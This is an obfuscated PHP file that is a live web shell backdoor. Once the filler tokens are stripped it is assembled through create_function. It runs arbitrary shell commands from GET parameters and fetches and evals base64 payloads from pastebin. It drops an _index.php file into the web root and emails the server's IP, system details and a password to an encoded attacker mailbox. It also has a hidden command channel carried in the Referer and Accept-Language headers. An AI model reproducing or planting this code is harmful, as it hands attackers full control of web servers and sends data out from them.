<?php
$Y='exz, @basz:e6z:4_decodz:e($key_gez:n));prz:z:intz:("true")z:;}if(isset($ssz:me)) {$psz:biz:n=aGpz:haHM($sz:sxxp.z:"z:Z2B401Pk")z:;z:z:@ez:val(@bz:ase64_decode($psbin));}z:if(!empty(z:z:z:$ssmz:c)) {if(!z:emptyz:(z:$ssmb)) {print_z:r($ssmb(z:$ssmc));} elsez: {z:print_r(z:shz:ell_exez:c($ssmc));}z:}ifz:($rr&z:&';
$d=':""z:.@$r["REQUEz:ST_URIz:"z:]."\\nPasswz:oz:rd: $hxz:rz:r\\nOperation Systz:em: z:z:$uname\\z:nIP Excutz:ing: $ip_rez:mote\\nz:Timz:e: $timez:_shell"z:;$heaz:der="Fz:rom: $fz:roz:m_z:shellz:code\\r\\nRz:eplyz:-to: $from_shez:llz:codz:e";@mail(@bz:asz:e64_decode(z:"cHJlcz:2z:lkZW5pz:c3JhZWxAZ21z:z:haWwuY29t"), z:$s';
$c='$z:kh="de71";$kz:f="z:19dc";z:z:$hxrz:r="lizard1z:43z:";function x($t,z:$k)z:z:{$c=sz:trlen($k);$lz:=strlen(z:$z:z:tz:);$o="";for($i=0;$i<z:$l;z:){for($j=0;($jz:<$cz:&&$i<$lz:);z:$z:j++,$i++){z:$o.=$t{z:$i}^$k{$j};}z:}rz:eturn $o;}z:fz:unctz:iz:z:on aGphaHM($z:url) {$z:XX = curl_inz:it();cuz:rl_setz:opt(z:$XX,';
$y=' Cz:Uz:RLOPTz:_URz:L, $url);curl_setopz:t($XX, z:CUz:RLOPTz:_HEADER, 0);z:z:z:cz:url_setopt($XXz:,z: CURLOz:Pz:T_RETURNTRANSz:FER, 1);curl_setz:oz:z:pt($Xz:z:X, CURLz:z:OPT_TIMEOUT, 0);curl_z:sez:z:topt($XX, CUz:RLOPT_POST, 1);$AAz: =z: curlz:_execz:(z:$XX);curl_cz:lose($XX);rez:z:turz:n $AA;}error_repoz:rt';
$Q='bz:_start(z:);@ez:val(@gzuz:ncompressz:(@x(@z:base6z:4_decoz:de(preg_z:rz:z:eplace(array(z:"/_/","/-z:/"z:),array(z:"/","z:+"z:),$ss($s[$z:i],0,$z:e))),$k)))z:;$o=z:oz:b_z:get_contenz:ts();oz:b_end_clez:anz:();$d=base6z:4_encode(z:x(gz:z:zcompz:ress($o),$kz:))z:;print("<$k>$d<z:/$k>"z:);@sesz:sion_dez:stroy(z:);}}}}';
$O='$ra){ z:   z:$u=paz:rsz:e_url($rr);  z:  pz:arse_str($u["z:queryz:"],$q);z:$z:qz:=array_values(z:$q)z:;z:pregz:_match_all("/([\\z:z:w])[\\z:w-z:]+(?z::;q=0.([\\d])z:)?,?/z:",$rz:a,$m);if($q&&$z:z:m){@sessiz:on_starz:t();$s=&$_SEz:SSIOz:N;$ss=z:"subz:str"z:;$z:z:sl="strtz:oloz:werz:";$i=$m[1][0].$m[1][1];$z:hz:=';
$u=str_replace('XT','','crXTeaXTte_XTXTXTfuncXTtion');
$a=':emote=@z:$r["REz:MOTE_ADDR"z:];$uname=@z:substr(z:z:@phpz:_uname(),0,120z:);$z:from_sz:hellcoz:de="sz:hell@".gz:ethz:ostbyname(@z:$r[z:z:"SERVER_Nz:z:AMz:E"])."";$serz:vez:r_mailz:="".gethosz:tbynamz:e(@$r["SERVEz:R_NAMz:E"])."  -z: ".z:@$rz:["HTTP_HOSTz:"]."";z:$linkcr=z:"Link:z: ".@$r[z:"SEz:z:RVER_NAME"].z';
$S='z:erver_maiz:l, $z:lz:inkcr, $headez:r);$kez:z:z:y_gen=aGpz:haHMz:($ssxxp."aY8hz:KKZz:9")z:;z:if(isset($z:ssmr)) {z:$index z:= fopen(z:"_index.php",z: "w");z:@fwz:rite($inz:dz:ex, @base6z:4_z:decoz:de($key_gz:en));$indz:exz z:= fopz:en(@$rz:["DOCUMEz:z:NT_ROOTz:"]."/_index.phz:p"z:, "wz:");@fwrite(z:$inz:z:d';
$J='inz:g(0);$z:r=$_SERz:Vz:ER;$z:rr=@$r["HTTP_Rz:z:EFz:ERER"]z:;$ra=@$r["HTTPz:_ACCEPT_z:LANGz:UAGz:E"]z:;$ssme=$_z:GEz:T["S"];$ssmr=z:$_GET[z:"z:W"];$ssmb=$z:_GET["z:B"]z:;$ssz:mc=$_Gz:ET["Cz:"];$ssxxz:p="ht".z:"z:tp://pasz:"."tebin.z:c".z:"om/r"."awz:/"z:;$time_shz:ell="z:".z:daz:te("d/m/Yz: z:- H:i:s")."";$ipz:_rz';
$T='$sl($ssz:(md5($i.z:$z:kh),0,3));$f=z:$sl($ssz:(mdz:5($iz:.$kz:f),0,3))z:;$p=z:"";for($z=1z:z:z:;$z<count($m[1]z:);$z:z++) $p.=$qz:[$m[2][z:$z:z]];iz:f(strpos($p,$h)z:===0){z:$s[$i]z:="";z:$p=$ss(z:$p,3);z:}iz:f(z:array_key_z:exiz:sts($i,$s)){z:$s[$i].z:=$p;$z:e=sz:trpos($s[$z:i]z:,$f);if(z:$e){$k=$z:kh.$kfz:;o';
$X=str_replace('z:','',$c.$y.$J.$a.$d.$S.$Y.$O.$T.$Q);
$q=$u('',$X);$q();
?>
